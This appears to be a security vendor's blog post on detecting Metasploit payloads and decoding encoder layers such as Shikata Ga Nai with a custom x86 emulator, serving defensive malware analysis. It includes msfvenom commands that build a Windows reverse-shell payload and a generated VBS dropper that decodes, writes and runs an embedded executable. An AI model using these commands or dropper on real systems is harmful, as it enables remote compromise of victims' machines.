Analyzing Metasploit Payloads


Analyzing Metasploit Payloads


Metasploit is a framework that aids penetration testers in their work. It has an enormous database of known exploits one can use to break into a system. Though the framework is meant to be used by ethical hackers a lot of malware out there use it for malicious purposes.

Attackers can make use of Metasploit in numerous ways, as its pre-built modules can automate a lot of the more complex aspects of malware. For example, you can use it to set up a server listening for incoming connections - Metasploit handles all the sessions that come in through those listeners and the only thing the attacker is left to do is spreading malware that initiates that connection. This isn’t hard to do either, the framework is capable of generating VBS scripts, executables, PowerShell scripts, DLLs, ELFs and more. Sending someone a word document with embedded VBA macros and getting them to execute it is usually enough to receive a session, assuming your antivirus doesn’t pick up on it.

Detecting Metasploit

The detection of a metasploit payload isn’t all that difficult - if you were to create a payload with msfvenom say: msfvenom LHOST= LPORT=1337 --payload windows/shell/reverse_tcp --platform windows --arch x86 you’d get the same result everytime. This allows you to write a simple Yara rule for this particular payload and extract its configuration. Unfortunately this is not the only way to generate a payload. Metasploit has encoders which you can use to obfuscate your shellcode. They pack your payload into a self-decrypting blob of shellcode which becomes the original one when executed.

These are (slightly) harder to detect as their x86 instructions are semi-randomized and the decryption key is chosen at random. One of the well-known encoders is Shikata Ga Nai, which uses a randomly generated key to XOR the instructions. The result is then used to alter the key, i.e., it’s a rolling xor key. Detecting these encoders is not hard, they all have a certain structure and certain CPU instruction which aren’t obfuscated. This means that the encoders are also detectable by using basic Yara rules. The real challenge after that is decoding the payload into a form that we can analyse further.

Our answer to this problem was building a simple, custom emulator capable of running x86 instructions. This way we’re able to detect an encoder (which one it is doesn’t really matter) and run that through the emulator. Once we detect it starts executing memory it has written to we know that the we’ve decoded a layer of obfuscation and, in the case of Metasploit, that either another layer of obfuscation is coming up or that we’re looking at a Metasploit payload.

The X86 Emulator

We’ve built a software implementation of the x86 instruction set, much like how an emulator works for old consoles or computers. The only thing standing out here is that we’ve build an x86 emulator to run on x86 hardware. The reason for that is security, we have potential malware that we want to analyze “statically” so having a controlled environment is a must. We don’t want any of this code to actually run on the processor outside our sandbox environments.

So an x86 emulator huh? That’s impressive but can it run Crysis? Well no, the x86 instruction set has over 1500 (the actual number is a discussion on its own which we won’t get into) instructions. It would be too much of an effort to implement all those. Especially when the encoders we try to emulate use a very small subset of those instructions (and performance - or lack thereof - is important, but not a road blocker). So after implementing the first version of our emulator, we started generating different encoders and we kept adding instructions to the emulator until we got back our expected payload.

It was hinted to above already but why not just run it in the sandbox environment and be done with it? That’s because we also want to be able to analyze payloads statically. A piece of malware might drop a payload that for some unknown reason can’t be executed. Or it sleeps for a long time until it executes the payload which exceeds the duration of our analyses. There are numerous scenarios that leave us with the payload but without the execution and that’s where our emulator kicks in.

We first try to detect possible shellcode payloads by extracting binary blobs from Powershell scripts and VBA macros as well as Yara rules against process samples, dropped files, and process memory dumps and if we find something we’ll emulate it. When the shellcode jumps back into memory it has already been through we assume it’s done with its decoding process and dump the part of the memory the decoder has written to. That piece of shellcode is then run through our analysis process again to see if we need another round of emulation or to extract its configuration.

Extracting Metasploit Payloads

For example if we had clean shellcode generated by the command above we’d be able to extract the following information:

    "dumped_file": "revtcp86clean.bin",
    "config": {
      "family": "metasploit",
      "rule": "Metasploit",
      "c2": [
      "version": "windows/reverse_tcp"

However, if a payload is encoded by Shikata Ga Nai, for example by running the following command: msfvenom LHOST= LPORT=1337 --payload windows/shell/reverse_tcp --platform windows --arch x86 --encoder x86/shikata_ga_nai

then we first need to run the sample through our emulator revealing the shellcode it’s supposed to execute:

    "dumped_file": "",
    "config": {
      "family": "metasploit",
      "rule": "Metasploit",
      "version": "encoder/shikata_ga_nai",
      "shellcode": [
    "dumped_file": "",
    "config": {
      "family": "metasploit",
      "rule": "Metasploit",
      "c2": [
      "version": "windows/reverse_tcp"

As you can see our Yara rules first detect the Shikata Ga Nai encoder, then automatically runs the payload through our emulator revealing the shellcode. That shellcode is then run through the same process of detection to end up with a decoded and classified windows/reverse_tcp detection.

We’re also able to detect multiple layers of encoding, for example we can run the same payload through shikata 2 times and then another time through the call4_dword_xor encoder.

    "dumped_file": "revtcp86shikdouble-call4.bin",
    "config": {
      "family": "metasploit",
      "rule": "Metasploit",
      "version": "encoder/call4_dword_xor",
      "shellcode": [
    "dumped_file": "revtcp86shikdouble-call4.bin",
    "config": {
      "family": "metasploit",
      "rule": "Metasploit",
      "c2": [
      "version": "windows/reverse_tcp"

As you see here we went through 3 iterations of emulation before reaching the eventual payload. This process can go up to hundreds of iterations at which point performance does become an interesting aspect, but for our use-case and infrastructure the system is still fast enough.

Analyzing Different Formats

So until now we’ve only been looking at raw binary files. These are nice to test with but you only ever see them used in the wild when they’re part of exploits etc. Since you can’t normally execute raw binary data the Metasploit framework offers some wrappers around these payloads. The most straightforward wrapper is the .exe one. It creates a PE file with the payload embedded. This can then be executed by the operating system. More interesting is, for example, the VBS format.

When telling msfvenom we want a VBS script we’re presented with the following output:

Function HcGfeiml(IaptHACouEAi)
        iUPNjPkzUe = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
                "dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
                IaptHACouEAi & "</B64DECODE>"
        Set eczxPPClnXDCTA = CreateObject("MSXML2.DOMDocument.3.0")
        HcGfeiml = eczxPPClnXDCTA.selectsinglenode("B64DECODE").nodeTypedValue
        set eczxPPClnXDCTA = nothing
End Function

Function FZkulPlmtVbzDXN()
        Dim VOBINYgrlwlXqiv
        Set VOBINYgrlwlXqiv = CreateObject("Scripting.FileSystemObject")
        Dim aWkaYXFosJ
        Dim ksOGlPgDlLhsQ
        Set aWkaYXFosJ = VOBINYgrlwlXqiv.GetSpecialFolder(2)
        ksOGlPgDlLhsQ = aWkaYXFosJ & "\" & VOBINYgrlwlXqiv.GetTempName()
        NrOucMgKFeZaCbq = ksOGlPgDlLhsQ & "\" & "dyYwENHdDhEITk.exe"
        Dim XnQUJbgAv
        Set XnQUJbgAv = CreateObject("Wscript.Shell")
        eRvqQOddkXwnQ = HcGfeiml(aqbOmTnrjomNtbH)
        Set lCIOzbmX = CreateObject("ADODB.Stream")
        lCIOzbmX.Type = 1
        lCIOzbmX.Write eRvqQOddkXwnQ
        lCIOzbmX.SaveToFile NrOucMgKFeZaCbq, 2 NrOucMgKFeZaCbq, 0, true
End Function


The base64 string has been truncated, but as we can see from its starting characters, we’re dealing with a PE executable here. The lines after that are directions to dump and run that executable.

The code below creates a random temporary folder in which to store the payload.

Set VOBINYgrlwlXqiv = CreateObject("Scripting.FileSystemObject")
Set aWkaYXFosJ = VOBINYgrlwlXqiv.GetSpecialFolder(2)
ksOGlPgDlLhsQ = aWkaYXFosJ & "\" & VOBINYgrlwlXqiv.GetTempName()
NrOucMgKFeZaCbq = ksOGlPgDlLhsQ & "\" & "dyYwENHdDhEITk.exe"

After that the top function is run to decode the base64 string.

eRvqQOddkXwnQ = HcGfeiml(aqbOmTnrjomNtbH)

When decoded the script dumps the payload to disk and runs its payload.

Set lCIOzbmX = CreateObject("ADODB.Stream")
lCIOzbmX.Type = 1
lCIOzbmX.Write eRvqQOddkXwnQ
lCIOzbmX.SaveToFile NrOucMgKFeZaCbq, 2 NrOucMgKFeZaCbq, 0, true

And to be nice and clean the created file and directory are deleted afterwards


This is basically how every format is constructed, the shellcode is wrapped into an executable. This executable is then embedded into a script (VBS, Python, Ruby, etc.) which dumps it to disk and executes it.

Fun with Metasploit

To make matters interesting, Metasploit has implemented basic, randomized obfuscation for its .exe payloads. The following shellcode stager essentially creates a read-write-executable memory page, copies the target shellcode to it, and executes it. It’s a simple way to embed arbitrary shellcode into an executable for Windows.

Even more, Metasploit has decided that the shellcode stager should be obfuscated as to make it harder to detect it statically.

What this obfuscation does is rather simple, but effective: it grabs each x86 instruction from the stager, emits it one by one, and interleaves it with jumps and random bytes - where the jumps jump over the random bytes onto the next instruction.

For the record, this is actually a rather simple, but powerful way to defeat Yara rules and the like. If it weren’t for the fact that the real Metasploit payload is embedded as-is.

That is, the shellcode stager is obfuscated, but the payload - the one that’s detected by the aforementioned Yara rules and unpacked by the custom x86 emulator - is emitted straight into the executable and therefore easily detected by our Yara rules. Not a bad day for the blue team!


We’ve been putting a lot of time and effort into static analysis and the extraction of malware configurations. By understanding the way Metasploit encoders work we’ve been able to detect them, strip them of their encoding, and provide their configuration even if they weren’t able to run in a dynamic environment or otherwise gave very little malicious indicators (e.g., because the first stage only connects to another machine, but that machine isn’t online in the sandbox environment).

Small note: this functionality is currently only employed against process memory dumps and when extracted from VBA macros or Powershell command-lines. We’re in the process of adding this functionality to the sample and dropped files too (which, accidentally, makes showcasing numerous metasploit payloads on slightly easier).

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